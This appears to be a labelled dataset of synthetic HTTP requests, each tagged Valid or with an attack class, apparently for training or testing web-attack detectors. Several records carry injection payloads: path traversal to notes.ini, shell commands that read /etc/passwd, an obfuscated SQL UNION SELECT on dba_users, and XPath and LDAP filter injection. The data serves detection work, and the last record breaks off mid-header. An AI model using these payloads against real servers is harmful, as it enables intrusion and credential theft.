Start - Id: 45046
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.1
Host: 137.63.163.69:771
Connection: close
Accept: image/png;q=0.4
Accept-Charset: x-mac-chinesesimp;q=0.9
Accept-Encoding: *;q=0.4
Accept-Language: lwce-4tmi, usTwqr-e4l, neqdmhk-eVw6g, eh-cOo, tyt-m4ae
Date: Mon, 27 Sep 04 09:07:51 GMT
If-Modified-Since: Sat, 01 Dec 07 15:54:58 CET
If-Range: *
Authorization: Basic ZWNhaDpycmFo
Referer: http://www.iien.cz/Eeixa/nPEjw/awzjctgv.exe
User-Agent: Mozilla/9.0 (compatible; Konqueror/6.5; Win98; laRt; rdesYenwEA; Aa6afmlig)
UA-CPU: PowerPC
UA-Pixels: 147x245
----: ----------------------------

null

End - Id: 45046
Start - Id: 13024
class: Valid
GET /@Pb65/aC0@.YV/gvxRPs.dll?ylqqhdem5UnuhlE=%2Fu%7EqeT&tmpGdeNl=y%3B%3Brn&oiasldohnh=g+T6+caet&aEyacbN9d=asimg9n%28sH&pyYcopyFJCAyndO=677897&NURH5=8190&jp=948227 HTTP/1.0
Host: 67.248.2.169:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.3, identity;q=0.8, gzip;q=0.3
Accept-Language: ex3st-ms1;q=0.4, e-egss, dns-wnha6ysf, i-3h, r3eofs-anlxe
Cache-Control: msl=joouieta
Client-ip: 82.22.221.79
Cookie: wfaoittEcsnzO=v~u/v;7cOvOOeg=etbt8
Cookie2: $Version="4"
Date: Sat, 14 Feb 04 16:46:19 CET
ETag: "e24vEhrUhq6Ee1j"
Expect: 100-continue
From: 5dwe1@ebi1lgoaan.gov
If-Modified-Since: Fri, 06 Oct 06 21:41:29 GMT
If-Unmodified-Since: Thu, 09 Aug 07 22:41:41 CET
If-Match: "jfjXhvAPryfJb1r3-d"
If-None-Match: "w8F4y4NAWJwOq6I2e0Y-"
If-Range: "EAdKQIEwUinC1bj3oN-"
Max-Forwards: 01
MIME-Version: 6.1
Pragma: rRie1='eld'
Proxy-Authorization: Digest qop=yHRl2
Authorization: hEmo3 gtAictP=eytcrh
Range: 777-8861,-671902,43-427
Referer: http://www.lerkeT.ch/ey8MfisS/idclrTha/trietw/91Sps.asmx
TE: deflate,deflate;q=0.0
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.5 (Windows; U; Win 9x 5.1; Qe-li; rv:0.6.2) Gecko/72522837
UA-CPU: StrongARM
UA-Disp: 5331,978,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 011x9947
Via: 0.2 20.190.78.52, 4.3 www.izca.js:17
Transfer-Encoding: uoEss; csunI=taRyo
Upgrade: ig6/1.7, nfeec/0.7, qsayo/2.5, usTac/5.5, leu/9.8
Warning: 458 www.Ib4ru.tiff:9066 "sSe4nhsT" 
X-Forwarded-For: 229.9.95.131
X-Serial-Number: 72290
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13024
Start - Id: 15006
class: Valid
GET /xs0owtoaO/iP11ad/hnircaniobmcd/lauthbrdahohab2oba/oa4GUXILqeGt.ZSao/iQtwe.dll? HTTP/1.1
Host: www.j7ure.it
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: x-mac-chinesesimp;q=0.8
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.8
Cache-Control: min-fresh=9105
Client-ip: 167.67.44.2
Cookie: aqr=/n >e]et|oe'bgsound|Te;a4hodx5ta=653;rtredpN8=90019;oanoMtt=8981
Cookie2: $Version="375"
Date: Wed, 24 May 06 11:48:52 CET
ETag: "5.iV125tRk10IjkqbYn"
Expect: wsWt
From: ol9n@oiatmee.uk
If-Modified-Since: Sun, 20 May 07 17:10:04 GMT
If-Unmodified-Since: Tue, 19 Aug 08 14:20:00 GMT
If-Match: "mTHcv97ozumJk.ps"
If-None-Match: "8QEXNxX3k2CxG_S8NMs"
If-Range: Wed, 01 Aug 07 12:39:08 UTC
Max-Forwards: 32
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM YWVvZXNFYTVub1J1aXRTcHNscmUwZW5lcmVjaWJsY2Rvc2J1
Authorization: Basic d2FuYXNuaXc6bHRianRsaQ==
Range: 438364-
Referer: http://www.raFOf.uk/nkleryn.cfm
TE: trailers,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: crTdkdla (e6jSWyWx)
UA-CPU: StrongARM
UA-Disp: 0183,0676,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7618x6392
Via: FTP/9.0 142.235.124.178
Transfer-Encoding: isdri; te6n=qdwmt
Upgrade: qe6/4.8, r9rard/7.5, yycDt/5.3, Les/1.2, e7u/9.1
Warning: 018 www.le4noeG.jpg "sgcenjna" 
X-Forwarded-For: 86.218.51.227
X-Serial-Number: 958943826904140
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15006
Start - Id: 3049
class: Valid
GET /nzeo4atnoii4cpsllan/wmX13fXTMPS/eSPvkzi517/eUhopgRnaeiynote/QMdb/acw92ia/Wvl5IJorKlX/wAFOsXadminh4uI8.E/3wccttbtel/tieo2tmds.shtml?zbjsxw909pyteo=udT2utn7Yl&tssao=%7E&ed1fzbshtrs9eam=60811309&iinnopt=ieceomFtorh56a&Esjq4CAB=4&nhdEehioaasae=tls%26i&tchsecsnozha=etrt-tT6ni&U41rjf@X=all%5Cn0ko&mE71XFA=eDGXON&uttbg8f5yrlniec=802771&hvdsyudrihlNt=6107993079&dT1hphhaem6Honn=932 HTTP/1.1
Host: 100.56.65.127
Connection: keep-alive
Accept: image/*
Accept-Charset: iso-8859-15
Accept-Encoding: compress, gzip, deflate, deflate, deflate;q=0.6
Accept-Language: qdfsaeih-sDyheu, nge-tsieru, ywgrw-ty, snlQlG-sg, h1ifo-t
Cache-Control: min-fresh=44693
Client-ip: 71.140.195.36
Cookie: il=?ote/divreh
Cookie2: $Version="178"
Date: Tue, 28 Mar 06 16:06:11 CET
ETag: "EzuQe-OrDGSEFMd2f"
Expect: yepnctt
From: clms@lki1al.be
If-Modified-Since: Fri, 27 Feb 09 09:18:46 GMT
If-Unmodified-Since: Fri, 01 Jul 05 24:10:03 GMT
If-Match: "6PPZjRkB3MFascEzYz@m"
If-None-Match: *
If-Range: Fri, 07 Mar 08 06:31:01 GMT
Max-Forwards: 690
MIME-Version: 6.8
Pragma: dp1hbFoa=sq
Proxy-Authorization: em1h oanPog=nsx8qtr5
Authorization: Basic bWh3aDpoU2Vzb3Bz
Range: -5,4-,8177-71443
Referer: /iei3w/ndoIEtai.wmn
TE: trailers,trailers
Trailer: Trailer
User-Agent: 2h8g5yKi9f http://www.rnik.st
UA-CPU: PowerPC
UA-Disp: 3168,424,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 3313x7933
Via: HTTP/5.2 www.whASoc.jpg, HTTP/6.6 www.6pa5t.png, 7.6 www.qLooeoe.jpeg
Transfer-Encoding: identity
Upgrade: Oso/1.6, n77i/2.9, maoeo/6.3, 6lx/0.3, nnpy/1.7
Warning: 569 www.oeereniu.htm:0303 "atsetrg" "Wed, 17 May 06 18:16:08 CET"
X-Forwarded-For: 9.39.20.77
X-Serial-Number: 79351042472156559
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3049
Start - Id: 43004
class: OsCommanding
POST /oddliadlnoidro/apncnpgmwrbiotu/Dwt5egi/fFgau.Rs.bZwPU.fW/oytesLyoi2orDde/nrnhpiIv/taiopE0a9ami.css? HTTP/1.1
Content-Length: 139
Content-Language: ergocd,Oo00ftI,2
Content-Encoding: compress
Content-Location: http://www.6Moe.be/zizn2e/tna6/eetnlg/eS8po8n.msf
Content-MD5: NWl6ZWJlYjBobmU4VXl5aA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 30 Mar 05 15:20:13 UTC
Last-Modified: Wed, 16 May 07 11:24:09 GMT
Host: www.n4gqdiae.uk
Connection: keep-alive
Accept: text/xml;q=0.0
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: min-fresh=15772
Client-ip: 110.134.30.79
Cookie: Fs2GxyQ=unionlrElSftp rpsi7between;bZEaWZe8log=esSMc/nyo
Cookie2: $Version="63"
Date: Tue, 09 Dec 08 11:06:56 GMT
ETag: W/"EOvZtIdss-Rbcsa0"
Expect: 100-continue
From: nerhOvTl@7taord7ae.gov
If-Modified-Since: Wed, 15 Dec 04 11:44:17 CET
If-Unmodified-Since: Tue, 25 Sep 07 20:15:46 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 11 Jan 06 01:45:27 UTC
Max-Forwards: 1164
Pragma: I=e9
Authorization: Digest username="alvtna"
Referer: /eoapgzq8/vfdrg/Dsdcrr3/nf0cs/lAjeo.mdb
TE: deflate,deflate;q=0.1,deflate;q=0.3
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.1 (compatible; yotvxjiiwe; Open BSD i586; lxsrwn7i; twte4; kshezurrbm)
UA-Pixels: 2695x320
Via: 4.5 246.6.12.40:3130, FTP/6.4 55.45.174.120, FTP/0.5 www.o8nos.jpeg
Transfer-Encoding: 1dynle; ehrnen=xcniebg
Upgrade: e5edij/1.7, tveoee/4.3
Warning: 863 www.t8fst5.js:4942 "iaa8uceowT1aeejsueoy" "Mon, 03 Nov 08 04:48:51 UTC"
X-Forwarded-For: 225.212.15.105
----: -----------------------

soErre4noeyppe=| cat    /etc/passwd   |&UangadaowrEnas=100473&WyhGQIp=no eoselect1&hoeel=e$2union]&hfynyx=onP&trhyjs=nYCDNM8Iv-

End - Id: 43004
Start - Id: 18769
class: Valid
GET /FZkedmailvY0Hjc5.aspx? HTTP/1.1
Host: 148.127.103.86
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: min-fresh=5
Client-ip: 130.75.186.181
Cookie: stIir=aKID8s8t8.;ntmgoelaDe1=doi  &?$dexecenph-$wmdsvarrR;JPAc2nph-K=:io1;uqHrOshutdownwinnt=sku;1likeh@Alibhs==hsnx hc/og8gr~uaEma
Cookie2: $Version="015"
Date: Fri, 02 Mar 07 12:33:06 UTC
ETag: "F4pahYczbUumgOsX-cl1"
Expect: 100-continue
From: 9Hmsl7@qEiue.biz
If-Modified-Since: Sun, 08 Mar 09 11:14:24 CET
If-Unmodified-Since: Mon, 26 Jul 04 05:50:49 GMT
If-Match: "XIfq70dkdtMZrp3l.1"
If-None-Match: "ScUZOEl0JwsefFZz"
If-Range: Sun, 30 Nov 08 04:47:48 UTC
Max-Forwards: 5177
MIME-Version: 0.4
Pragma: 1b='etwid'
Proxy-Authorization: Digest cnonce="iiniu"
Authorization: eErmCd Tnoivh=edw7
Range: 1460-
Referer: /eaheti/t9a2/neeUtns.mpg
TE: deflate;q=0.3,trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: wnhpal4 (smR_5K; rbEdT3W)
UA-CPU: Sparc
UA-Disp: 414,132,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 842x5949
Via: FTP/8.6 www.htalsX2m.png
Transfer-Encoding: yIlR; annmein=wrsteARp
Upgrade: scjua/4.0, O6ncj/2.1, voL8r/4.5, etq/4.7
Warning: 895 www.ef4ioNd.js "fj9cdOInrh" 
X-Forwarded-For: 11.94.114.1
X-Serial-Number: 57174297786
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18769
Start - Id: 25227
class: Valid
GET /eeat0w6pa0tmi/Y8/9RxMDT.css?wcoLhmgtpeldeeO=mCm HTTP/1.0
Host: www.Dlr3ce.be
Connection: close
Accept: */*;q=0.0
Accept-Charset: euc-kr;q=0.2
Accept-Encoding: 
Accept-Language: doetd-2o;q=0.2, eaii3-ytn9B, hstd-iAoekCj, nt4k-etg, 3ok-NCsueo
Cache-Control: max-stale
Client-ip: 188.84.7.22
Cookie: 4tn=549555;sut0n=4s5tamxowqrsidjeh;8uH4mlJJ=mtriseoslio;lnstd=rhUcmd
Cookie2: $Version="642"
Date: Wed, 28 Jan 04 09:30:17 CET
ETag: W/"9@I4d6_H7UPz_6.aVxtR"
Expect: Eieo7sz
From: k4NgNry@tf92Cos.be
If-Modified-Since: Thu, 21 Feb 08 20:08:20 CET
If-Unmodified-Since: Sat, 15 Dec 07 23:03:20 CET
If-Match: *
If-None-Match: *
If-Range: "D8JB_8nxgY3XDDznLUzZ"
Max-Forwards: 3
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest response="69E2cbeb8477f4FfE943AF3eDDA5FeD4"
Range: 0953-9712,14819-971,55-
Referer: /sww1Hrr/c4vavcr/2reIiai.php4
TE: trailers,trailers
Trailer: From
User-Agent: daPtvaaWr/6.0.3.4.9
UA-CPU: PowerPC
UA-Disp: 468,067,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 765x9448
Via: aqeisE/6.7 224.216.230.219
Transfer-Encoding: identity
Upgrade: 4DTm/7.9, 4nd/2.1, blaaL/7.8, bsr8r4/1.2
Warning: 490 www.n7rtrte.htm "6nrmt" 
X-Forwarded-For: 128.219.12.193
X-Serial-Number: 39906730696975900354
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25227
Start - Id: 14678
class: Valid
GET /tMFOkI77Qq/eaZ2yhnnlul7aTorier/b7KWh@mLMIwWhfGebj/p2saacrahngrkmza3xs/eSUr5eahaSg26b8pet/dMSidbP@A85ihBhVdG.H/hncahrSy.jpeg?ieaeztTh=0&ruytoens0u=+t&cr68mih9af8=93306213&ZBIhDautoexec6aMdO1=%5CBilSsSs%26%2Br&ifx=60 HTTP/1.0
Host: 178.194.200.49
Connection: keep-alive
Accept: video/*
Accept-Charset: gb2312;q=0.5, iso-2022-jp;q=0.1
Accept-Encoding: 
Accept-Language: eo7E-oeu;q=0.5, e-ks, ogLumti-e;q=0.1, iaeysSue-rndsn7ir
Cache-Control: max-age=861
Client-ip: 236.166.2.186
Cookie: HqEXnesHtt=haupdatea;Iiaeaflenaet=QmaremC;eotrpi7=83;euto=hnsfChoimns;nah=8861869929;Vr=snobjecth
Cookie2: $Version="1"
Date: Fri, 18 Mar 05 23:11:37 UTC
ETag: "7TA1tq-VAIZ2QijN"
Expect: ckg7=keHeinA
From: ew4dDBs@eoeatshefo.uk
If-Modified-Since: Sun, 14 Jun 09 22:54:09 UTC
If-Unmodified-Since: Wed, 12 Mar 08 03:00:54 GMT
If-Match: *
If-None-Match: "OtfjEcZcw7NogWLchQ"
If-Range: Sun, 21 Oct 07 09:18:29 UTC
Max-Forwards: 9550
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: EOoh Ellxd=Dta1et4X
Authorization: erAl asoeea=xWjo
Range: 95058-8
Referer: http://Esmy.gov/lcdlRozN/arrswnn.php3
TE: chunked;q=0.9,trailers
Trailer: Referer
User-Agent: dbJz7B9n http://www.eekeotcp.de
UA-CPU: Sparc
UA-Disp: 1652,237,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2290x4730
Via: t3n/0.6 www.nsas1e8.css, 6.5 242.137.49.62, FTP/8.1 129.8.228.58:06086
Transfer-Encoding: compress
Upgrade: f01ie/0.8
Warning: 180 www.m3onn.css:1 "qTae" "Mon, 27 Sep 04 12:49:47 UTC"
X-Forwarded-For: 90.226.61.85
X-Serial-Number: 5935364150091795
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 14678
Start - Id: 29418
class: Valid
GET /3tndtzAsiyflzeaA4m/o9zooy2eiahrA1is/eDK.1378wV@a1.jh.asp?ieapphO=hwinntb-Iyt&OWdC1Ghq=mtmpfprocessing-instruction&WAn.ACm6gW=awupdate+passwd9KndSrbs&sosbp8UL=Fn8lbdrrdirCi&enhOeuniatt9l3e=02&.y51z19Z1I=unnHrass6&i6fDso8ehtetmn=ee%27ameta&fcUshohe3ies=iwpo&m98RzFxVCZV=qdK87hdZ-P&Altcreh=%3E2%271n+lib&zitte=a6_u HTTP/1.1
Host: 55.236.198.142
Connection: keep-alive
Accept: */*
Accept-Charset: big5;q=0.3, iso-2022-jp;q=0.4, cp-936, iso-8859-9
Accept-Encoding: 
Accept-Language: Ouirktit-h8;q=0.0, ni8-e;q=0.1, e-Nuh6, ce-ltfsho;q=0.8
Cache-Control: max-stale=184
Client-ip: 214.249.83.255
Cookie: etsie=896047;chprdh3hax5ya=w58s0oZQH_eI;2theaofsr6nlrIn=emvqeSM;1JKSo5aRpXi=tm8)s;ddswt=~lsa eBdischdn
Cookie2: $Version="12"
Date: Wed, 30 Jan 08 01:03:13 GMT
ETag: W/"jMOh75yYYBefnn43znI"
Expect: 100-continue
From: suaPf@niebaoeya.org
If-Modified-Since: Mon, 03 May 10 04:48:41 GMT
If-Unmodified-Since: Mon, 06 Jul 09 04:56:18 UTC
If-Match: "Uzn5housFrE-nIB"
If-None-Match: *
If-Range: Wed, 21 Oct 09 16:34:26 UTC
Max-Forwards: 399
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM b25lc2xsYUVLZXNzbGR0b21pZXJ5YTl3YWhvZWVzdHRiaXR5aHFyZ2Rpb2tiYXJ1
Authorization: eahs dsIm=hn8lhz
Range: 2-278,82-815
Referer: http://www.ntan.fr/zexSe6ye/niyvfre.aspx
TE: trailers
Trailer: Upgrade
User-Agent: rusm (nf5-mOu)
UA-CPU: MIPS
UA-Disp: 2709,267,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 437x5082
Via: FTP/0.9 www.coBe.gif:7850, 5.9 55.38.24.34
Transfer-Encoding: gzip
Upgrade: r5nsd/8.4, eecerh/9.5
Warning: 703 77.103.235.152 "rrfeeSn4cnstcAhs" "Sat, 09 May 09 09:03:00 GMT"
X-Forwarded-For: 25.153.217.247
X-Serial-Number: 754248
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29418
Start - Id: 43471
class: OsCommanding
GET /day/fcn6r/aa/l_Bx3HX8reDq_RSxvd/asadetltm2neuEre1/nZK44c0r6rJj.shtml?hi=9&ulMeOrasRR=nggusjauW4tO&hurm=eadqc&aQifEMbgsoundBVsystemI=L7Z74xiwget&ceus=21211&eyrtigrveo3M=372&aeihunc=46941&sunnluYae=aennNeilran%2Br&sdntt0X=r&gra2ebspdfuwm=49104340&smtsmt=cat++++%2Fetc%2Fpasswd%7C&hT0e=gpnt0sQ&sEawdzotA=ostyletuechofrom84l&sqE=46108962 HTTP/1.1
Host: www.aoncnves.ch:80
Connection: e9mibs
Accept: image/jpeg, audio/*, audio/*
Accept-Charset: koi8
Accept-Encoding: *;q=0.2
Accept-Language: drgde-Ioxehin;q=0.4, xO-drl, ei4oam-hr, tu2mvlg-ypadyrd, noemu-enntes
Cache-Control: max-stale
Client-ip: 5.223.71.17
Cookie: 40objectwhereAUe3=445;oeta9ssb7gfl9=Tpgas
Cookie2: $Version="2"
Date: Mon, 07 Dec 09 07:11:44 UTC
ETag: "W_D-MMI1DqBWzuzV"
Expect: a0e4=fTceith;k6wd=ANnd
From: t3bs@fsiaebtorf.it
If-Modified-Since: Wed, 13 Jan 10 04:11:00 CET
If-Unmodified-Since: Fri, 14 Jan 05 12:18:01 UTC
If-Match: *
If-None-Match: "@vpav.5.eGQq70-hJS"
If-Range: *
Max-Forwards: 7
MIME-Version: 5.4
Pragma: iaa='dwiadst5'
Proxy-Authorization: Digest username="ncuenm"
Authorization: Basic dzNzMmFjOmVocG5tTmI=
Referer: /folsurhh/i16cl/cewme/EtrYto.php
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/8.6 (Windows; U; Win 9x 5.7; oi-gN; rv:2.0.7) Gecko/54601096
UA-CPU: Sparc
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 828x8678
Via: FTP/8.3 www.sNniaeis.html, 7.0 95.104.213.87
Transfer-Encoding: deflate
Upgrade: nsae/6.6
Warning: 666 166.163.91.248 "reqnetwydVCbEhnmif" "Thu, 16 Oct 08 05:40:51 UTC"
----: -----------------------------

null

End - Id: 43471
Start - Id: 33186
class: Valid
POST /wgete.escript5oidugGab/nn/hAetMekneeticM/saitbO/Nx9/roqTULb@/iMzoslpoq/olcuaEjVRrh6Pr.om/a5rg-nxCnFnBR/eL0x2U8/biinssextoapw5Srhnz/bOi1lr5ilaPShzI.htm? HTTP/1.1
Content-Length: 121
Content-Language: 60iKotO,ci,cf
Content-Encoding: identity
Content-Location: http://orrdc.net/ttehrc.php
Content-MD5: RThGdGVuYW85YWJvbnRhYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 09 Jan 04 09:47:24 CET
Last-Modified: Sun, 07 Feb 10 19:44:36 CET
Host: 101.70.96.104:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: rtuOe0n-9nngncrn;q=0.4
Cache-Control: max-stale
Client-ip: 18.214.52.39
Cookie: LnlJC9varYtG=ena6udbaphosm;T8tfg=0se(hoe0o9e)ae@;tl4h8=mailtePWeo2y25;sibhnmrIx=tr;tUsf1lbtne7g=a|iegx;c6foyspNlc2su=rB5Sz8
Cookie2: $Version="453"
Date: Sat, 12 Nov 05 11:38:24 CET
ETag: "VA6Cmm7Y3oyhrr3oP."
Expect: 100-continue
From: bowRwos@eCtnuhy9r.cz
If-Modified-Since: Thu, 29 Apr 10 01:24:42 GMT
If-Unmodified-Since: Tue, 02 Jan 07 24:25:14 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 26 Jan 08 07:57:13 GMT
Max-Forwards: 8523
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Basic Z0Vkbm9laTpycXhtdA==
Authorization: Basic ZW9ub3l0OmNoanVu
Range: 8-21126,9-397638
Referer: http://MoVntlok.fr/60ihp/lcOm/j1lmeo.pl
TE: trailers
Trailer: Accept-Encoding
User-Agent: lsyeco8nGwphet
UA-CPU: PowerPC
UA-Disp: 3344,7896,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 7712x8519
Via: HTTP/5.2 161.142.238.187, 7.4 www.is0ir.png:94
Transfer-Encoding: gzip
Upgrade: afteyP/8.9, csc/8.1, exortn/7.3, erha/8.6, aschS/4.3
Warning: 827 www.xnro.htm:61693 "jnuhnb0isss" "Sun, 06 Feb 05 14:14:12 CET"
X-Forwarded-For: 68.186.72.84
X-Serial-Number: 0421946796861302632
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

uo=eB@Zk4&xfCfrn= db&i4O1sid=imgr&arinHmnno1e2H=a9y&2TRayasTiwipjdT=wn4akalieGq&iosiraeuceo=quGf_SfQamC&dhnhwtnc0=70806

End - Id: 33186
Start - Id: 44545
class: OsCommanding
GET /bin/sgi6o.pl/seite=;cat eshop.pl|? HTTP/1.0
Host: www.impl5attm.ch:154
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.0
Accept-Encoding: deflate
Accept-Language: sdM-pd;q=0.0, d-cel6liw
Cache-Control: only-if-cached
Client-ip: 15.83.253.70
Cookie: @1orsock_streamDobody=aresaIouruhx;ta=39551724;S8S3Ow0=6230764;eenitrkaoa=te;8vautoexecoSp=te@lvbscriptperl$ale
Date: Sat, 30 May 09 14:50:15 UTC
ETag: "jkPmPul2szt6mLKeLP"
From: 8ofb@eetrrga.de
If-Modified-Since: Wed, 08 Nov 06 22:00:48 GMT
If-Unmodified-Since: Sat, 01 Oct 05 24:33:49 GMT
If-Match: *
If-None-Match: "pIRxJZZe33nH.B71FO"
If-Range: Thu, 01 Feb 07 18:09:19 GMT
Max-Forwards: 4262
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Basic YXJucGF4bnM6Rm90aGl6
Authorization: NTLM eUVhdFlmbnJkd2U0bWh3cmVOdGlvZmQ5aG95ZWRkc3k=
Range: -06354,383-6635,26244-
Referer: /parl/tsulWiaa/mndssvp.avi
TE: deflate;q=0.2
Trailer: Transfer-Encoding
User-Agent: gjreechwnh/2.5
UA-Pixels: 069x3705
Via: 6.0 www.rmHi6x.shtml:820, 2.0 52.249.176.251
Transfer-Encoding: deflate
Warning: 178 www.psrrz.gif:1 "5eiuelyVouirXa" 
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 44545
Start - Id: 49948
class: XPathInjection
GET /bPbinvPW1xnubneI/o6/wstSetlo/X0vbscriptQ5/aeo1y8sm5qsnbtsF/eO12ZYO52/eYLZvzfEjrQyxpFe5/jdYe@Exk2NM-L6NQ/aLoV9us.sh?SlFD=wweez%3Cchpat&ae6lsaE=%28i++%3C++++count%28ofnh%2Fchild%3A%3Atext%28%29%29++++and+j+%3C+++count%28bn%2Fchild%3A%3Acomment%28%29%29+++++and++k++%3C++++count%28oecw%2Fchild%3A%3A*%29+++%29&mientmobenOde=679839&ea=ADtn&rwindow.openOTky=dsi&1tahn5DEee=c2&VDconnectVQ=i%26enemwindow.openchildhbau&ddtmpfscriptlinkKhtpass=ioqahjB%3Ayn HTTP/1.1
Host: www.Gsutbadh.de
Connection: keep-alive
Accept: image/gif, application/*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.6
Cache-Control: min-fresh=00
Client-ip: 6.57.199.123
Cookie: sfadtjtrnwninn=s ;hwcr=areox;hortk=3;ubVGjfgu=]asl ia;uyiii7o=3;cqrtimyymittenI=nNiCD
Cookie2: $Version="9"
Date: Fri, 08 Sep 06 03:13:45 CET
ETag: "lxemiDvLWMw9dQLdPP"
Expect: 100-continue
From: thnep@gnfilnelrR.biz
If-Modified-Since: Mon, 09 Jan 06 22:20:05 UTC
If-Unmodified-Since: Fri, 05 Jun 09 10:28:12 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 02 Dec 09 21:50:14 GMT
Max-Forwards: 07
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: NTLM ZWNuN2NibnJlbjJqZ253bWVlcnRXZmRvc2xvdmxubGllY2FyZWl3ZXBOd2w=
Authorization: evwOlt lsy3mt=9sciu
Range: 33-0
Referer: http://peii.st/levnr5a.exe
TE: trailers
Trailer: Expect
User-Agent: snntsne
UA-CPU: x86
UA-Disp: 2308,4283,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 299x2707
Via: FTP/9.3 www.9goxeoae.tiff
Transfer-Encoding: ueeaak
Upgrade: d4T/6.8, oecM/8.1, tgey/1.2, v4dyl/2.5
Warning: 456 243.193.239.132 "aIeI4en5" "Fri, 30 Mar 07 09:51:48 CET"
X-Forwarded-For: 174.45.94.7
X-Serial-Number: 84157643689
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49948
Start - Id: 42177
class: SqlInjection
GET /07EW/haroggohrst3atnYt/mFNn-r/gj/wna/lVbhji15/eehtshyrhsaTtfe/Itax013rors/sbCt5/tjw4qVmemU6OMmEV3/ppelninUo.png?ialsz=chairs%27+++UN%2F**%2FION+++++SEL%2F**%2FECT+++++t0tne+FROM++++dba_users+WHERE++ihasotnc++++like++%27%2525 HTTP/1.1
Host: 49.243.124.227
Connection: n47ir
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=67
Client-ip: 171.126.113.10
Cookie: oeto1a=ctlu3rldhft;@2bC9K2r=08411217
Cookie2: $Version="85"
Date: Fri, 26 Aug 05 08:46:52 GMT
ETag: W/"NGLysbC8Lx4iZGnoq6"
Expect: 100-continue
From: hmrl@wdteioa4s.uk
If-Modified-Since: Sun, 25 Feb 07 23:12:35 CET
If-Unmodified-Since: Thu, 05 May 05 17:06:57 GMT
If-Match: "boYIb4i8MsFnDmJd_V"
If-None-Match: *
If-Range: Fri, 24 Sep 04 19:13:03 CET
Max-Forwards: 3904
MIME-Version: 5.3
Pragma: eiio=ystj
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: Basic ZWltZWFtb1Q6MmFiaWF3RWU=
Range: 1010-
Referer: http://esRatoi.st/RldEA/lleN/wh5i4c.wav
TE: gzip,gzip;q=0.2,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.6 (X11; U; Unix 8.6; kt-ru; rv:9.0.4) Gecko/53434111
UA-CPU: StrongARM
UA-Disp: 290,899,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 249x8623
Via: wh3i86/8.6 84.214.31.249, 6.6 152.243.157.211
Transfer-Encoding: deflate
Upgrade: amt/4.2, wwaier/5.7, iaqR/1.4
Warning: 076 187.215.178.176 "4XWrtebohs" 
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42177
Start - Id: 38757
class: LdapInjection
GET /eOdT-FvE-V/endKGzot7AqHpx.sh?ch=wHn&si3bHn=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&C2maila=7517511673&RtrleamaD=eesy&variframebKrcpYbgsound3mw=%40e+aD9renetcattekxty+iu&casd=41391744&siar7ettncrN=tKyikgio41H8&ctt=djl&AePtoD-NsEEc=qefw+dct%3Eio&aeHtn=74 HTTP/1.0
Host: www.gtnt.net
Connection: oaf7ss
Accept: */*;q=0.7
Accept-Charset: euc-kr, x-mac-turkish
Accept-Encoding: identity, identity
Accept-Language: *
